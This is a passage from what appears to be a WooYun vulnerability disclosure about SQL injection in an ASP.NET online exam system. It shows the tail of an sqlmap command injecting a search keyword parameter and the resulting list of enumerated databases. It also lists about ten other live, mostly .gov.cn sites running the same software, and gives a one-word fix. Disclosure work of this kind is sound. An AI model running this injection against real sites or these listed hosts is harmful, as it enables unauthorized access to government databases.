%2BivlTwvYT5kAgUPFgIfAgUJ5peg6K6w5b2VZAIHD2QWCmYPFQIn6auY57qn6ZSA5ZSu5rKf6YCa5oqA5ben77ya56ys5LiA6YOo5YiGG%2BmrmOe6p%2BmUgOWUruayn%2BmAmuaKgOW3py4uLmQCAQ8PFgIfAgUBMGRkAgMPDxYCHwIFATBkZAIEDxUDAjEwATByICA8YSBocmVmPSdodHRwOi8vd3d3LmNzc3R1ZHkuZ292LmNuOjgwL0V4YW0vZXhhbV90ZXN0LmFzcHg%2FZXhhbV9pZD0zJnBpZD0wJyAgdGFyZ2V0PeKAmF9ibGFua%2BKAmT7lj4LliqDmtYvor5U8L2E%2BZAIFDxYCHwIFCeaXoOiusOW9lWQCCA9kFgpmDxUCEWFhYWFhYWFhYWFhYWFhYWFhC2FhYWFhYWFhLi4uZAIBDw8WAh8CBQEwZGQCAw8PFgIfAgUBMGRkAgQPFQMBMgEwcyAgPGEgaHJlZj0naHR0cDovL3d3dy5jc3N0dWR5Lmdvdi5jbjo4MC9FeGFtL2V4YW1fdGVzdC5hc3B4P2V4YW1faWQ9MTImcGlkPTAnICB0YXJnZXQ94oCYX2JsYW5r4oCZPuWPguWKoOa1i%2BivlTwvYT5kAgUPFgIfAgUJ5peg6K6w5b2VZAIJD2QWCmYPFQIb5Yib5paw56S%2B5Lya5rK755CG77yI5LiL77yJG%2BWIm%2BaWsOekvuS8muayu%2BeQhu%2B8iOS4iy4uLmQCAQ8PFgIfAgUBMGRkAgMPDxYCHwIFATBkZAIEDxUDATEBMBLor7flhYjpgInlrabor77ku7ZkAgUPFgIfAgUJ5peg6K6w5b2VZAIEDw8WBB4LUmVjb3JkY291bnQCNB4OQ3VzdG9tSW5mb1RleHQFNuiusOW9leaVsO%2B8mjUy77yM5YWxNumhte%2B8jOesrDHpobXvvIzmr4%2FpobUxMOadoeiusOW9lWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jdGwxMSRidG5TZWFyY2htS4JBUpHZuiWXYI25QZdIY8gDFA%3D%3D&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWBQLn9fKjAQKBpvHtBQLu6IzfAQLJyaq0BALGrYOHDo7hGuFgIVEBA2RO3ELakr%2FbolQR&hidPageID=6&ctl05%24hdnServerID=-1&selectSearch=Course&ctl11%24txtKeyword=ff&ctl11%24btnSearch.x=46&ctl11%24btnSearch.y=8" -p "ctl11%24txtKeyword" --dbs
FO] retrieved: master
[02:13:27] [INFO] retrieved: model
[02:13:27] [INFO] retrieved: msdb
[02:13:28] [INFO] retrieved: ReportServer
[02:13:28] [INFO] retrieved: ReportServerTempDB
[02:13:29] [INFO] retrieved: tempdb
available databases [11]:
[*] 1
[*] educhangshu
[*] educhangshubasentNew
[*] educhangshubasentold
[*] educhangshuforum
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
到这里差不多了
顺便搜集了些站供中心验证:
http://www.jhpx.com:8002/exam/default.aspx
http://www.yzxxc.gov.cn/Exam/Default.aspx
http://www.sxxsdxf.cn/Exam/Default.aspx
http://www.whce.gov.cn/Exam/Default.aspx
http://gbjy.yw.gov.cn/Exam/Default.aspx
http://www.yulinstudy.gov.cn/Exam/Default.aspx
http://www.0575study.gov.cn/Exam/Default.aspx
http://www.csstudy.gov.cn/Exam/Default.aspx
http://wssy.hnsy.org.cn/Exam/Default.aspx
http://www.ndgb.gov.cn/Exam/Default.aspx
................
修复方案:
过滤
版权声明:转载请注明来源 answer@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:16
确认时间:2014-10-14 17:19
厂商回复:
最新状态:
暂无